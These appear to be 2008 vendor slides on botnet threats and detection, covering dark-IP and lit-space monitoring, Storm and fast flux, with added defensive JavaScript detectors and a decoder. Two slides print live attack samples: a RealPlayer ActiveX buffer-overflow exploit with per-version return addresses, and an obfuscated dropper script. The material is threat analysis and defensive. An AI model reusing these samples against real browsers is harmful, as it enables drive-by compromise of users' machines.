Lit Space Monitoring for Botnets
Stuart Staniford, Chief Scientist
1/21/2008
Botnets = Targeted Infection + Remote Control Payload
Botnet - a collection of compromised PCs (bots) under remote command & control (C&C) to perpetrate a range of criminal activities
Remote control payload enables further malicious payload installs
Malicious payloads enable monetization via:
  Spam relay (leased to spammers)
  DDoS (extortion business model)
  ID theft (consumer, business, or gov't)
  Intellectual property theft
  Phishing site hosting
  Click fraud
  Online financial services fraud
  E-commerce site fraud
Botnets Are A Critical Threat
Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007
Botnet worm infections can occur even [with] the very latest antivirus signatures and … OS and application patches.
Up to a quarter of computers on the net may be used by cyber criminals in so-called botnets - Vint Cerf
Botnets: A Global Pandemic
Growing Wave of Concern
[Chart: Botnet Attack Evolution. X axis: time, in three phases - Nuisance (late 1990's - 2002), Concern (2003 - 2006), Danger (2007 - beyond). Y axis: Magnitude of Threat (Low to High). Victim tiers: Consumer, Service Provider, Enterprise, Government/Cyber warfare.]
Threat labels on the chart, in the groups as extracted:
  DDoS, SPAM, Spyware platform, Steal resources
  Mass-scale DDoS, Mass-scale SPAM, Click fraud, Identity Theft, Phishing, Pharming
  Wide-scale revenue loss, Corporate Espionage, Total enterprise collapse, Intellectual Property Theft, Compliance Risks, Productivity Loss, Brand Damage, Resource Inefficiency, Cyber-terrorism
Traditional Botnet (first half 2000s)
Grow by active scanning
Command & Control via IRC
Still a lot of that about
Portion of a botnet tracked by FireEye botwall network
Monitoring Traditional Botnets
Dark IP Space/Network Telescope
Wait for bot to scan, and try to capture
Tradeoffs of Dark IP Monitoring
Advantages
  Fidelity - if something scans dark IP, it is likely bad
  Cheap/easy - can cover a lot of IP space that wasn't being used, especially internally to enterprises
Disadvantages
  Some bots avoid the dark-IP space - they scan selectively
  Persuading the bot to talk can be tricky - need a deep-interaction honeypot to do it right
  Bots are moving away from scanning as a technique
  Bot-owners can learn dark IPs if there is feedback (e.g. to signatures)
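The two sides of the tradeoff above, as an added example that is not from the slides: a minimal dark-IP telescope over constructed flow records. Flows whose destination falls inside the unused ("dark") prefixes are attributed to their source, and a source that probes several dark addresses is reported as a scanner. The second source in the sample shows the caveat the slide raises: a bot that scans only lit addresses never touches the telescope and is not seen. The prefixes, flow records and threshold are all constructed for this example.

```javascript
// Added example (not from the slides): a dark-IP telescope over constructed
// flow records. Anything hitting unused address space is high-fidelity
// evidence; anything that avoids it is invisible to this sensor.

// Dotted-quad IPv4 -> unsigned integer.
function ipToInt(ip) {
  return ip.split(".").reduce((acc, octet) => acc * 256 + Number(octet), 0);
}

// "10.20.0.0/16" -> { start, end } as integers.
function parseCidr(cidr) {
  const [base, bitsStr] = cidr.split("/");
  const size = 2 ** (32 - Number(bitsStr));
  const start = Math.floor(ipToInt(base) / size) * size;
  return { start, end: start + size - 1 };
}

function inDarkSpace(ip, darkRanges) {
  const n = ipToInt(ip);
  return darkRanges.some(r => n >= r.start && n <= r.end);
}

// Returns the sources that touched at least `threshold` distinct dark
// destinations, sorted. Lit-only traffic never contributes a hit.
function findDarkSpaceScanners(flows, darkPrefixes, threshold = 3) {
  const ranges = darkPrefixes.map(parseCidr);
  const hits = new Map(); // src -> Set of dark destinations it probed
  for (const f of flows) {
    if (!inDarkSpace(f.dst, ranges)) continue;
    if (!hits.has(f.src)) hits.set(f.src, new Set());
    hits.get(f.src).add(f.dst);
  }
  return [...hits.entries()]
    .filter(([, dsts]) => dsts.size >= threshold)
    .map(([src]) => src)
    .sort();
}

// Constructed sample: 10.20/16 and 10.99/16 are unused inside a fictional enterprise.
const DARK_PREFIXES = ["10.20.0.0/16", "10.99.0.0/16"];
const SAMPLE_FLOWS = [
  { src: "10.1.5.7",  dst: "10.20.3.4",  dport: 445 }, // sequential scanner hits dark space
  { src: "10.1.5.7",  dst: "10.20.3.5",  dport: 445 },
  { src: "10.1.5.7",  dst: "10.20.3.6",  dport: 445 },
  { src: "10.1.5.7",  dst: "10.1.0.10",  dport: 445 },
  { src: "10.1.9.9",  dst: "10.1.0.10",  dport: 445 }, // selective scanner: lit hosts only
  { src: "10.1.9.9",  dst: "10.1.0.11",  dport: 445 },
  { src: "10.1.9.9",  dst: "10.1.0.12",  dport: 445 },
  { src: "10.1.0.10", dst: "10.20.3.4",  dport: 80 },  // a single stray hit, below threshold
];

console.log(findDarkSpaceScanners(SAMPLE_FLOWS, DARK_PREFIXES)); // [ '10.1.5.7' ]
```

The threshold is what keeps the sensor's fidelity: one stray packet into dark space (a typo, a misconfigured client) does not raise an alert, but a host walking a dark range does. The selective scanner at 10.1.9.9 produces identical volume and never appears, which is exactly why the slide pairs dark-IP monitoring with observation of the lit space.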
Directions in Botnet Technology
Technology evolution is rapid
  Well-funded industry
  Smart technologists
  Disciplined execution of attacks and management of resources/business
Gives various trends that render current defensive technologies obsolete
  1. Exploits via web/email (bypass firewall)
  2. Obfuscation and polymorphism (bypass AV/IPS)
  3. Distributed command-and-control, and high turnover of assets
     1. renders trackdown and clean-up hard
     2. DNS tracking hard
     3. Web crawling behind the curve
Exploits via web
if(user.indexOf("nt 5.")==-1)return;VulObject="I"+"ER"+"PCtl.I"+"ERP"+"Ctl.1";try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");Padding="";JmpOver=unescape("%75%06%74%04");for(i=0;i<32*148;i++)Padding+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape("%7f%a5%60");else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");else return}else if(RealVersion=="6.0.14.544")ret=unescape("%63%11%08%60");else if(RealVersion=="6.0.14.550")ret=unescape("%63%11%04%60");else if(RealVersion=="6.0.14.552")ret=unescape("%79%31%01%60");else if(RealVersion=="6.0.14.543")ret=unescape("%79%31%09%60");else if(RealVersion=="6.0.14.536")ret=unescape("%51%11%70%63");else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}var cuteqqdbug;AdjESP="LLLL\\XXXXXLD";var cuteqqdbug2;cuteqqdbug2=cuteqqdbug;Shell="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";PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x8000)PayLoad+="copyleft";Real["Import"]("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)}RealExploit();
More obfuscated example
<script language=JavaScript>function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23,3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)-48];sttp=saam<<s;w|=sttp;if(s){kek0=165^w;keke=kek0&255;kiki=keke;r=r+String.fromCharCode(kiki);s-=2;w=w>>8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}dc("pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb4Ta45pZ9ooUb2HfhDsXkcYfh3BCNgf8N@YJ45EXyi9ZPwkXown8bIs8BTy9k3hvo_k5o@9YV@GDMTzXo3SXBwn8MIGdk31CNISWN@kgV5pRMVId9xKa45pRmeKvy28iZcU5y2oa45acGeK0qIGdk31CN4SWN@Hwy2myMwcUkdQaP_cvP@u9mTlJpTaiZcu8o@kWB_HfhDsXkcCfh3BCNgjvo_S8NIWdP@n9mTGvowYXhIYXkcCibIvvEVf9hdsCVT8ix5kjPThJkIvdE3SCNwWaFIsWVxS6k3mg4TMdEIW5E@ljP_HwiwnXo@1XP_HYyDsUEwWXo@Cw25y0ZTvvo@HYyDsUEwkCVxL6oIQ9hcAxpTau2_S9BTEXi_Q9N@k5owmJkIvdE3SCNwWaFIsWVoQ9N@k5owyiZTvvo@Hwb2sUkInjEwW6kc1vo_k1kIn5o@1uBwSCV3l9hwyiZTkjPThwb2sUkInjEwW6oguXkIW8PdhyMokaEtWyF6HOFcHgFtkuMDaumTvvo@Hljd15JVmlb3n5aokaEidXo@udEw1DFeKjh3W8hdlak6yiZTHujIn8PdqdE@nWFcHZPwkXowndiwX5o@FvP_k5ow1OP@s6bd15o@dXo@udEw1e45HuM@OdP_fDPThljd15JVkiZTHxV5HumTfvE@QW2TOD9VO92UaumTHum0@5aV@9qisvP_fDk3z6ptyiZTHumT6XBwGjj3W8hdlakcfUkdQaP_Eao3l9hwSChdlaogSWB@Mdowl9VoQ9N@k5owyiZTHumT@vP_fDPxk8B_mbb_GUooQ9N@k5ow1ZB@GdP_hyMUCwMUaumTHu23l9BThbhIWWFdmuqUHwPTpumVSCNIhUbduCVgGXowYCBdyuFdbxF6HxBTkjPThujIn8PdqdE@nejd26GcCZ9VWyF6HxBTVWairW0txWhIn8PdQCkcAxpTmWFraumTHuFdXWm6VWairW0txWhIn8PdQCkcmOG6HxBTKDB@G5kdnab_F9k3W6GUyuFrHiZTHumTQUE@QWMDHYyDsUEwkCVxL6oIQ9hcPxpTmW25HumTHyo@QvEdyumTHu25HumTfvE@QW2TO9qeO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbe45HumTfvE@QW2TO9qeulVT9iZTHumTKDB@G5kdnab_F9k3W6GUyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TOayoO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbepTHumTHiZTHuMIS8h3HyM_PYq_Ci45HumTHYyDsUEwkCVxL6oIQ9hcAx45HumTHyo@QvEdyumTHumTaumTH
ZkIuXPTClhUBlVT9iZTHumTKDB@G5kdnab_F9k3W6GtyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TO6b2O92UaumTHuF2BWBwldP_5XhwCXo@mOqUaumTHu2IWXkIbepTHumTHiZTHum3QjkILUP_9umTaumTHuF2BWBwldP_5XhwCXo@mwqUHu25HumTHyo@QvEdyumTHiZTHgV5HuM@OdP_fDPThYyDsUEwkCVxL6oIQ9h6aumTy0ZTHuMIS8h3HuFt9iZTHumTC9h3SeEUaumTHZkIuXPTHw4UaumTHumwl8kIndEw1amdWXo3myMgQDP@lYPdsvqiW1E3zaP_WuG7AJmdn6oTyiZTHumTC9h3SeEUHu25HumTzXo3SXBwn045HumTHyo@QvEdyumTHumTHu25HuFrauFragV5abk_18P_k5owHlb3n5aokaEidXo@udEw1DFeK50_Q9N@kiRDauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gAlF6HOFcHgFtku2@QCh_WaPTClB0@1VTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gWlF6HOFcHgFtku2@QCh_WaPTClVtJ8q_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWF71uqKkuFTmuFgAwmTWXP_L9VwHyM_WxJ_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWm7YwmTSgpTFOG6Hyh3nXV@1W2TOayoO925Hwo3HrFeK50_Q9N@1wowzXPDRjP6Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2@QCh_WaPTClhUBlVTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaPTPrBTnJFUYwmTSgpTFOG6Hyh3nXV@1W2TO6b2O925m0x5pRM@f9hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25")</script>
Variables and encoding can be polymorphic - not much for signatures to go on
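The dc() routine above is the part a signature cannot rely on, but it is also the part an analyst can reproduce. What follows is an added example, not code from the slides: a static re-implementation of dc() that returns the decoded text instead of handing it to document.write(), so the injected content can be read without executing any of the page. The substitution table is copied from the slide's script; the sample strings ("7X", "NdkT") and the sample script are constructed for this example, not the slide's encoded payload.

```javascript
// Added example, not code from the slides: a static re-implementation of the
// dc() routine from the obfuscated script, returning the decoded text instead
// of evaluating it.

// Substitution table copied verbatim from the slide's dc(); it is indexed by
// charCode - 48, so '0'..'9', '@', 'A'..'Z', '_' and 'a'..'z' carry values.
const DC_TABLE = [
  63, 11, 56, 48, 57, 43, 35, 36, 27, 31, 0, 0, 0, 0, 0, 0, 53, 20, 29, 7, 55, 44,
  8, 9, 5, 49, 46, 32, 16, 40, 45, 18, 28, 0, 42, 4, 33, 39, 61, 23, 3, 2, 26, 0, 0,
  0, 0, 52, 0, 47, 14, 38, 51, 59, 6, 34, 13, 62, 15, 12, 10, 24, 17, 60, 25, 41,
  54, 21, 37, 22, 19, 50, 58, 30, 1,
];
const DC_XOR_KEY = 165; // the "165^w" step in the original

// Mirrors dc(): four 6-bit symbols are packed little-endian into three bytes
// (a private base64 variant) and every output byte is XORed with 165.
// Symbols outside the table decode as 0, exactly as the original's
// `undefined << s` does.
function dcDecode(encoded) {
  let out = "";
  let pending = 0; // `s` in the original: bits carried over from the last symbol
  let acc = 0;     // `w` in the original: packed-bit accumulator
  for (let p = 0; p < encoded.length; p++) {
    const idx = encoded.charCodeAt(p) - 48;
    const sym = idx >= 0 && idx < DC_TABLE.length ? DC_TABLE[idx] : 0;
    acc |= sym << pending;
    if (pending) {
      out += String.fromCharCode((acc ^ DC_XOR_KEY) & 255);
      pending -= 2;
      acc >>= 8;
    } else {
      pending = 6; // first symbol of a group of four: nothing to emit yet
    }
  }
  return out;
}

// Pull every dc("...") call out of a captured script and decode its argument.
// The regex requires a quoted literal, so the definition dc(sed) is skipped.
function decodeDcCalls(scriptText) {
  const results = [];
  const re = /dc\("([^"]*)"\)/g;
  let m;
  while ((m = re.exec(scriptText)) !== null) results.push(dcDecode(m[1]));
  return results;
}

// Constructed sample (not the slide's string): "NdkT" is "Hi!" under this scheme.
const SAMPLE_SCRIPT = '<script>function dc(sed){/* ... */}dc("NdkT")</script>';
console.log(decodeDcCalls(SAMPLE_SCRIPT)); // [ 'Hi!' ]
```

The point for detection is the one the slide makes: the table, the XOR key and the variable names can all be regenerated per page, so matching on them is futile, whereas the sink (a document.write or eval of data that was just decoded) is the stable behaviour. Decoding offline, as here, is how the payload behind that sink is recovered for classification.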
Preliminary Experiment on open network (Dec)
  ~5000 users
  ~3 hrs of intermittent data
  Parsed HTTP and entities
  ~200,000 HTTP-containing flows
  Google Safe Browsing API alerted on ~700 of them
  Manually verified - only 11 checked out
  Daily rate is ~100 incidents/day
Don't know how many were successful at this point
Not sure how typical this period is, so only an order-of-magnitude estimate
Google Safe Browsing API is 99%+ false positives
  Reasons not well understood yet
Gearing up for another experimental run
Hopefully LEET 08 paper
Distributed Command and Control - Storm
Grow by spam/malicious downloads - has been running for 12 months now in plain sight
No scanning!
115,000 seen from a single .edu
eDonkey UDP messages in Peer-to-Peer command and control
Dynamic Infrastructure - Fast Flux
DNS Servers
Small Number of Persistent Content Servers
Large Number of Dynamic Proxies
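The slide only draws the architecture: a few persistent content servers hidden behind a large, changing pool of proxies that the DNS servers rotate through. As an added example that is not from the slides, the following scores successive DNS answers for one name against the observable side effects of that architecture: short TTLs, many distinct A records that change between lookups, and addresses scattered across unrelated /16 networks. These indicators are general fast-flux characteristics rather than figures from the talk; the thresholds and the lookup records are constructed for this example (documentation and private address ranges, so none is a real host).

```javascript
// Added example, not from the slides: fast-flux indicators over successive
// DNS answers for a single name.

function prefix16(ip) {
  return ip.split(".").slice(0, 2).join(".");
}

// lookups: successive answers for one name, each { ttl, addresses: [...] }
function fluxIndicators(lookups) {
  const seen = new Set();
  let shortTtl = 0;
  let changed = 0;
  lookups.forEach((l, i) => {
    l.addresses.forEach(a => seen.add(a));
    if (l.ttl <= 300) shortTtl++;
    if (i > 0) {
      const prev = new Set(lookups[i - 1].addresses);
      if (l.addresses.some(a => !prev.has(a))) changed++; // a new proxy rotated in
    }
  });
  return {
    distinctAddresses: seen.size,
    distinctNetworks: new Set([...seen].map(prefix16)).size,
    shortTtlFraction: lookups.length ? shortTtl / lookups.length : 0,
    changeFraction: lookups.length > 1 ? changed / (lookups.length - 1) : 0,
  };
}

// All four indicators must fire together; any one alone (a CDN's short TTL,
// a round-robin pool) is normal hosting, not flux. Thresholds are constructed.
function looksFastFlux(lookups) {
  const ind = fluxIndicators(lookups);
  return ind.shortTtlFraction >= 0.5 && ind.distinctAddresses >= 5 &&
    ind.distinctNetworks >= 3 && ind.changeFraction >= 0.5;
}

// Constructed lookups: RFC 5737 documentation ranges and private 10/8 space.
const FLUX_LOOKUPS = [
  { ttl: 60,  addresses: ["192.0.2.10", "198.51.100.7",  "203.0.113.22", "10.4.8.15", "10.17.3.9"] },
  { ttl: 60,  addresses: ["192.0.2.44", "198.51.100.7",  "203.0.113.90", "10.31.6.2", "10.17.3.9"] },
  { ttl: 120, addresses: ["192.0.2.10", "198.51.100.61", "203.0.113.22", "10.4.8.15", "10.88.1.1"] },
];
const STABLE_LOOKUPS = [
  { ttl: 3600, addresses: ["192.0.2.1", "192.0.2.2"] },
  { ttl: 3600, addresses: ["192.0.2.1", "192.0.2.2"] },
  { ttl: 3600, addresses: ["192.0.2.2", "192.0.2.1"] }, // reordered, not changed
];

console.log(looksFastFlux(FLUX_LOOKUPS), looksFastFlux(STABLE_LOOKUPS)); // true false
```

The network-diversity indicator is the one that separates a flux pool from a legitimate load-balanced service: an operator's own servers cluster in a few netblocks, while compromised proxies are wherever the bots happen to be. It is also the indicator the slide's "high turnover of assets" point makes hard to suppress, since the proxies are not the operator's to place.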
FireEye, Inc. Confidential 15
Rendering Current Approaches Obsolete
  Antivirus: bypass by not matching AV signatures
  IDS/IPS: bypass by not matching signatures & using other infection vectors
  Network Behavior Analysis: bypass by low & slow spread
  Dark IP Honeypots: bypass by not targeting dark IP addresses and honeypots
GAP: need a security solution that scales with the exponential nature of the threat
Lit Space Monitoring
Global Deployment
Local Analysis & Protection
Global Analysis & Intelligence Distribution
Thank you!
Q & A